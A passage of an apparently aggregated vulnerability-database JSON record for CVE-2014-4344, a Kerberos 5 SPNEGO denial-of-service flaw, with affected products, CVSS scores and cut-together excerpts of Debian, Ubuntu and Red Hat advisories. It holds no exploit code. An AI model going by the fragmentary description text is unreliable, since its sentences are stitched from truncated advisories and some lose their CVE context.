"enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.7" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" } ], "sources": [ { "db": "BID", "id": "69160" }, { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "NVD", "id": "CVE-2014-4344" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.12.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-4344" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The vendor reported this issue.", "sources": [ { "db": "BID", "id": "69160" } ], "trust": 0.3 }, "cve": "CVE-2014-4344", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 7.8, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-4344", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-4344", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201408-252", "trust": 0.6, "value": "MEDIUM" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "NVD", "id": "CVE-2014-4344" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The acc_ctx_cont function in the SPNEGO acceptor in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.5.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty continuation token at a certain point during a SPNEGO negotiation. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions. \nVersions prior to Kerberos 5 1.12.2 are vulnerable. \n\nCVE-2014-4343\n\n An unauthenticated remote attacker with the ability to spoof packets\n appearing to be from a GSSAPI acceptor can cause a double-free\n condition in GSSAPI initiators (clients) which are using the SPNEGO\n mechanism, by returning a different underlying mechanism than was\n proposed by the initiator. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.10.1+dfsg-5+deb7u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.12.1+dfsg-7. ==========================================================================\nUbuntu Security Notice USN-2310-1\nAugust 11, 2014\n\nkrb5 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Kerberos. This issue only affected Ubuntu\n12.04 LTS. This\nissue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected\nUbuntu 10.04 LTS and Ubuntu 12.04 LTS. \nThis issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. \n(CVE-2014-4344)\n\nTomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon\nincorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n krb5-admin-server 1.12+dfsg-2ubuntu4.2\n krb5-kdc 1.12+dfsg-2ubuntu4.2\n krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2\n krb5-otp 1.12+dfsg-2ubuntu4.2\n krb5-pkinit 1.12+dfsg-2ubuntu4.2\n krb5-user 1.12+dfsg-2ubuntu4.2\n libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2\n libgssrpc4 1.12+dfsg-2ubuntu4.2\n libk5crypto3 1.12+dfsg-2ubuntu4.2\n libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2\n libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2\n libkdb5-7 1.12+dfsg-2ubuntu4.2\n libkrad0 1.12+dfsg-2ubuntu4.2\n libkrb5-3 1.12+dfsg-2ubuntu4.2\n libkrb5support0 1.12+dfsg-2ubuntu4.2\n\nUbuntu 12.04 LTS:\n krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5\n krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5\n krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5\n krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5\n krb5-user 1.10+dfsg~beta1-2ubuntu0.5\n libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5\n libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5\n libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5\n libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5\n libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5\n libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5\n libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5\n libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5\n\nUbuntu 10.04 LTS:\n krb5-admin-server 1.8.1+dfsg-2ubuntu0.13\n krb5-kdc 1.8.1+dfsg-2ubuntu0.13\n krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13\n krb5-pkinit 1.8.1+dfsg-2ubuntu0.13\n krb5-user 1.8.1+dfsg-2ubuntu0.13\n libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13\n libgssrpc4 1.8.1+dfsg-2ubuntu0.13\n libk5crypto3 1.8.1+dfsg-2ubuntu0.13\n libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13\n libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13\n libkdb5-4 1.8.1+dfsg-2ubuntu0.13\n libkrb5-3 1.8.1+dfsg-2ubuntu0.13\n libkrb5support0 1.8.1+dfsg-2ubuntu0.13\n\nIn general, a standard system update will make all the necessary changes. The verification\n of md5 checksums and GPG signatures is performed automatically for you. (CVE-2014-4341)\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the libkrb5 library occasionally attempted to free\nalready freed memory when encrypting credentials. As a consequence, the\ncalling process terminated unexpectedly with a segmentation fault. \nWith this update, libkrb5 frees memory correctly, which allows the\ncredentials to be encrypted appropriately and thus prevents the mentioned\ncrash. (BZ#1004632)\n\n* Previously, when the krb5 client library was waiting for a response from\na server, the timeout variable in certain cases became a negative number. \nConsequently, the client could enter a loop while checking for responses. \nWith this update, the client logic has been modified and the described\nerror no longer occurs. After installing the\nupdated packages, the krb5kdc daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: krb5 security, bug fix and enhancement update\nAdvisory ID: RHSA-2015:0439-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html\nIssue date: 2015-03-05\nCVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343 \n CVE-2014-4344 CVE-2014-4345 CVE-2014-5352 \n CVE-2014-5353 CVE-2014-9421 CVE-2014-9422 \n CVE-2014-9423 \n=====================================================================\n\n1. Summary:\n\nUpdated krb5 packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\nKerberos is a networked authentication system which allows clients and\nservers to authenticate to each other with the help of a trusted third\nparty, the Kerberos KDC. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. A remote, unauthenticated attacker could\nuse this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)\n\nA buffer overflow was found in the KADM5 administration server (kadmind)\nwhen it was used with an LDAP back end for the KDC database. A remote,\nauthenticated attacker could potentially use this flaw to execute arbitrary\ncode on the system running kadmind. (CVE-2014-4345)\n\nA use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5\nlibrary processed valid context deletion tokens. An attacker able to make\nan application using the GSS-API library (libgssapi) call the\ngss_process_context_token() function could use this flaw to crash that\napplication. (CVE-2014-5352)\n\nIf kadmind were used with an LDAP back end for the KDC database, a remote,\nauthenticated attacker with the permissions to set the password policy\ncould crash kadmind by attempting to use a named ticket policy object as a\npassword policy for a principal. (CVE-2014-5353)\n\nA double-free flaw was found in the way MIT Kerberos handled invalid\nExternal Data Representation (XDR) data. An authenticated user could use\nthis flaw to crash the MIT Kerberos administration server (kadmind), or\nother applications using Kerberos libraries, using specially crafted XDR\npackets. (CVE-2014-9421)\n\nIt was found that the MIT Kerberos administration server (kadmind)\nincorrectly accepted certain authentication requests for two-component\nserver principal names. A remote attacker able to acquire a key with a\nparticularly named principal (such as \"kad/x\") could use this flaw to\nimpersonate any user to kadmind, and perform administrative actions as that\nuser. (CVE-2014-9422)\n\nAn information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS\nimplementation (libgssrpc) handled certain requests. An attacker could send\na specially crafted request to an application using libgssrpc to disclose a\nlimited portion of uninitialized memory used by that application. \n(CVE-2014-9423)\n\nTwo buffer over-read flaws were found in the way MIT Kerberos handled\ncertain requests. A remote, unauthenticated attacker able to inject packets\ninto a client or server application\u0027s GSSAPI session could use either of\nthese flaws to crash the application. An\nattacker able to spoof packets to appear as though they are from an GSSAPI\nacceptor could use this flaw to crash a client application that uses MIT\nKerberos. (CVE-2014-4343)\n\nRed Hat would like to thank the MIT Kerberos project for reporting the\nCVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT\nKerberos project acknowledges Nico Williams for helping with the analysis\nof CVE-2014-5352. \n\nThe krb5 packages have been upgraded to upstream version 1.12, which\nprovides a number of bug fixes and enhancements, including:\n\n* Added plug-in interfaces for principal-to-username mapping and verifying\nauthorization to user accounts. \n\n* When communicating with a KDC over a connected TCP or HTTPS socket, the\nclient gives the KDC more time to reply before it transmits the request to\nanother server. (BZ#1049709, BZ#1127995)\n\nThis update also fixes multiple bugs, for example:\n\n* The Kerberos client library did not recognize certain exit statuses that\nthe resolver libraries could return when looking up the addresses of\nservers configured in the /etc/krb5.conf file or locating Kerberos servers\nusing DNS service location. The library could treat non-fatal return codes\nas fatal errors. Now, the library interprets the specific return codes\ncorrectly. (BZ#1084068, BZ#1109102)\n\nIn addition, this update adds various enhancements. Among others:\n\n* Added support for contacting KDCs and kpasswd servers through HTTPS\nproxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)\n\n4. Solution:\n\nAll krb5 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. \n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1084068 - ipv6 address handling in krb5.conf\n1102837 - Please backport improved GSSAPI mech configuration\n1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly\n1109919 - Backport https support into libkrb5\n1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext\n1118347 - ksu non-functional, gets invalid argument copying cred cache\n1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens\n1121789 - CVE-2014-4343: use-after-free crash in SPNEGO\n1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators\n1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens\n1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure\n1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)\n1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update\n1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name\n1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)\n1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)\n1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)\n1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)\n1184629 - kinit loops on principals on unknown error\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nppc64:\nkrb5-debuginfo-1.12.2-14.el7.ppc.rpm\nkrb5-debuginfo-1.12.2-14.el7.ppc64.rpm\nkrb5-devel-1.12.2-14.el7.ppc.rpm\nkrb5-devel-1.12.2-14.el7.ppc64.rpm\nkrb5-libs-1.12.2-14.el7.ppc.rpm\nkrb5-libs-1.12.2-14.el7.ppc64.rpm\nkrb5-pkinit-1.12.2-14.el7.ppc64.rpm\nkrb5-server-1.12.2-14.el7.ppc64.rpm\nkrb5-server-ldap-1.12.2-14.el7.ppc64.rpm\nkrb5-workstation-1.12.2-14.el7.ppc64.rpm\n\ns390x:\nkrb5-debuginfo-1.12.2-14.el7.s390.rpm\nkrb5-debuginfo-1.12.2-14.el7.s390x.rpm\nkrb5-devel-1.12.2-14.el7.s390.rpm\nkrb5-devel-1.12.2-14.el7.s390x.rpm\nkrb5-libs-1.12.2-14.el7.s390.rpm\nkrb5-libs-1.12.2-14.el7.s390x.rpm\nkrb5-pkinit-1.12.2-14.el7.s390x.rpm\nkrb5-server-1.12.2-14.el7.s390x.rpm\nkrb5-server-ldap-1.12.2-14.el7.s390x.rpm\nkrb5-workstation-1.12.2-14.el7.s390x.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-4341\nhttps://access.redhat.com/security/cve/CVE-2014-4342\nhttps://access.redhat.com/security/cve/CVE-2014-4343\nhttps://access.redhat.com/security/cve/CVE-2014-4344\nhttps://access.redhat.com/security/cve/CVE-2014-4345\nhttps://access.redhat.com/security/cve/CVE-2014-5352\nhttps://access.redhat.com/security/cve/CVE-2014-5353\nhttps://access.redhat.com/security/cve/CVE-2014-9421\nhttps://access.redhat.com/security/cve/CVE-2014-9422\nhttps://access.redhat.com/security/cve/CVE-2014-9423\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi\ngZD8EL2lSaLXnIQxca8zLTg=\n=aK0y\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6) - i386, x86_64\n\n3. \n\nIt was found that if a KDC served multiple realms, certain requests could\ncause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)\n\nThese updated krb5 packages also include several bug fixes. Space precludes\ndocumenting all of these changes in this advisory. Users are directed to\nthe Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the\nReferences section, for information on the most significant of these\nchanges", "sources": [ { "db": "NVD", "id": "CVE-2014-4344" }, { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "BID", "id": "69160" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-4344", "trust": 3.3 }, { "db": "BID", "id": "69160", "trust": 1.9 }, { "db": "OSVDB", "id": "109389", "trust": 1.6 }, { "db": "SECUNIA", "id": "59102", "trust": 1.6 }, { "db": "SECUNIA", "id": "61051", "trust": 1.6 }, { "db": "SECUNIA", "id": "60448", "trust": 1.6 }, { "db": "SECUNIA", "id": "60082", "trust": 1.6 }, { "db": "SECTRACK", "id": "1030706", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2014-003819", "trust": 0.8 }, { "db": "CS-HELP", "id": "SB2022060309", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-252", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "127813", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127825", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128077", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130669", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128660", "trust": 0.1 } ], "sources": [ { "db": "BID", "id": "69160" }, { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4344" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "id": "VAR-201408-0299", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44448256 }, "last_update_date": "2023-12-18T11:43:11.335000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Fix null deref in SPNEGO acceptor [CVE-2014-4344]", "trust": 0.8, "url": "https://github.com/krb5/krb5/commit/a7886f0ed1277c69142b14a2c6629175a6331edc" }, { "title": "RHSA-2015:0439", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0439.html" }, { "title": "Ticket #7970 NULL dereference in SPNEGO acceptor for continuation tokens [CVE-2014-4344]", "trust": 0.8, "url": "http://krbdev.mit.edu/rt/ticket/display.html?id=7970" }, { "title": "krb5-krb5-1.12.2-final", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51699" }, { "title": "krb5-krb5-1.12.2-final", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51700" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-476", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "NVD", "id": "CVE-2014-4344" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://advisories.mageia.org/mgasa-2014-0345.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2015-0439.html" }, { "trust": 1.6, "url": "http://aix.software.ibm.com/aix/efixes/security/nas_advisory1.asc" }, { "trust": 1.6, "url": 